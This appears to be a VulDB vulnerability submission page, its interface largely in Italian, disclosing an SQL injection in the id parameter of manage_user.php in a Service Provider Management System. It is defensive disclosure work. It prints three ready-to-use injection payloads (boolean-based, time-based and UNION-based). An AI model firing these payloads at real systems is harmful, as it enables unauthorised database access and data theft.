Invia #149333: SQL injection vulnerability exists in Service Provider Management Systeminformazioni

TitoloSQL injection vulnerability exists in Service Provider Management System
DescrizioneSQL injection vulnerability exists in id parameter of /admin/user/manage_user.php file of Service Provider Management System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. When visit /admin/index.php and page parameter is ‘user/manage_user’,it will include /admin/user/manage_user.php,and id parameter can do sql injection. Payload: page=user/manage_user&id=2' AND 7013=(SELECT (CASE WHEN (7013=7013) THEN 7013 ELSE (SELECT 4819 UNION SELECT 2303) END))-- - or page=user/manage_user&id=2' AND (SELECT 8622 FROM (SELECT(SLEEP(5)))zCHu) AND 'WFIl'='WFIl or page=user/manage_user&id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176767171,0x78774c524743567055775176746245474a4a6456476c54517a716e724d645648657a4e4171667958,0x716b787671),NULL,NULL,NULL,NULL,NULL,NULL-- -
Fonte⚠️ https://github.com/E1CHO/cve_hub/blob/main/Service%20Provider%20Management%20System/Service%20Provider%20Management%20System%20-%20vuln%203.pdf
Utente
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Sottomissione27/04/2023 05:35 (3 anni fa)
Moderazione27/04/2023 15:38 (10 hours later)
StatoAccettato
Voce VulDB227591 [SourceCodester Service Provider Management System 1.0 manage_user.php ID iniezione SQL]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!